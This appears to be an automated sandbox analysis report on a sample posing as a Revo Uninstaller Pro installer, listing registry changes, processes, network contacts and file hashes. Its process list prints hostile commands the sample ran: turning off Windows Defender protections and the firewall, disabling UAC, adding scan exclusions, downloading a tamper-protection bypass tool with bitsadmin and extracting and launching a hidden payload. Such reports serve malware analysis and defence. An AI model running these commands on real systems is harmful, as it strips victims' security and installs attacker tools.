| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\{305CA226-D286-468e-B848-2B2E8E697B74} 2 = "8" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.ruel | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS\ = "0" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder\Attributes = "48" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\ = "LicProtector Object" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\.ruel | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32\ = "C:\\PROGRA~1\\VSREVO~1\\REVOUN~1\\ruplp.exe" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$C0060,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "
C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3024A,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\system32\rundll32.exe
"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\system32\regsvr32.exe
"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "
C:\Windows\SysWOW64\mode.com
mode 65,10
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Windows\SysWOW64\timeout.exe
timeout /T 180 /NOBREAK
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"111.exe"
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"C:\ProgramData\uzlyLtM20yixSdV\111.exe"
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"C:\ProgramData\uzlyLtM20yixSdV\111.exe"
C:\ProgramData\uzlyLtM20yixSdV\111.exe
"C:\ProgramData\uzlyLtM20yixSdV\111.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telete.in | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
Files
memory/4092-0-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/4092-2-0x0000000000401000-0x00000000004A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
| MD5 | d0e24e6d7017127bea02bb0160229bee |
| SHA1 | 34350e5b7f268797b2a7ec56390c2228f841b37b |
| SHA256 | ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994 |
| SHA512 | f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86 |
memory/4540-6-0x0000000000400000-0x0000000000689000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-F7UCB.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs
| MD5 | c84933bcccf41369ef9ecce015b86ed0 |
| SHA1 | 624713276ae217d8d05c03598eecd31209c7f77a |
| SHA256 | ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679 |
| SHA512 | 221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363 |
C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat
| MD5 | b0a7842dd51df8942bc8b837282d1c2b |
| SHA1 | 0e9432597657c28ca9ac766ac7bf0a903d6aeb3b |
| SHA256 | 4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8 |
| SHA512 | b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6 |
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
| MD5 | dc21d689cfa1860e8820ed0ee45b1f2a |
| SHA1 | acf2db6df76114601a2e58097629e0c8cbce129b |
| SHA256 | 01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c |
| SHA512 | a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140 |
memory/3948-33-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
| MD5 | 74f1186a6d3bc01716681712c6b24a74 |
| SHA1 | 9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18 |
| SHA256 | d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d |
| SHA512 | bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0 |
memory/4540-51-0x0000000000400000-0x0000000000689000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\iswin7logo.dll
| MD5 | 1ea948aad25ddd347d9b80bef6df9779 |
| SHA1 | 0be971e67a6c3b1297e572d97c14f74b05dafed3 |
| SHA256 | 30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488 |
| SHA512 | f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545 |
memory/3340-56-0x00000000748B0000-0x00000000748CB000-memory.dmp
memory/4092-68-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/3340-71-0x0000000075660000-0x0000000075671000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\b2p.dll
| MD5 | ab35386487b343e3e82dbd2671ff9dab |
| SHA1 | 03591d07aea3309b631a7d3a6e20a92653e199b8 |
| SHA256 | c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2 |
| SHA512 | b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09 |
C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
memory/3340-75-0x0000000007390000-0x000000000739F000-memory.dmp
memory/1572-80-0x0000000004AA0000-0x0000000004AD6000-memory.dmp
memory/1572-81-0x0000000005130000-0x0000000005758000-memory.dmp
memory/1572-82-0x0000000004F80000-0x0000000004FA2000-memory.dmp
memory/1572-83-0x0000000005860000-0x00000000058C6000-memory.dmp
memory/1572-84-0x00000000059C0000-0x0000000005A26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pyjodul3.kdv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1572-94-0x0000000005B40000-0x0000000005E94000-memory.dmp
memory/1572-95-0x0000000006040000-0x000000000605E000-memory.dmp
memory/1572-96-0x00000000060E0000-0x000000000612C000-memory.dmp
memory/1572-97-0x0000000007010000-0x0000000007042000-memory.dmp
memory/1572-98-0x000000006F6E0000-0x000000006F72C000-memory.dmp
memory/1572-108-0x0000000006610000-0x000000000662E000-memory.dmp
memory/1572-109-0x0000000007050000-0x00000000070F3000-memory.dmp
memory/1572-110-0x00000000079B0000-0x000000000802A000-memory.dmp
memory/1572-111-0x0000000007370000-0x000000000738A000-memory.dmp
memory/1572-112-0x00000000073E0000-0x00000000073EA000-memory.dmp
memory/1572-113-0x00000000075F0000-0x0000000007686000-memory.dmp
memory/1572-114-0x0000000007570000-0x0000000007581000-memory.dmp
memory/1572-115-0x00000000075A0000-0x00000000075AE000-memory.dmp
memory/1572-116-0x00000000075B0000-0x00000000075C4000-memory.dmp
memory/1572-117-0x00000000076B0000-0x00000000076CA000-memory.dmp
memory/1572-118-0x0000000007690000-0x0000000007698000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
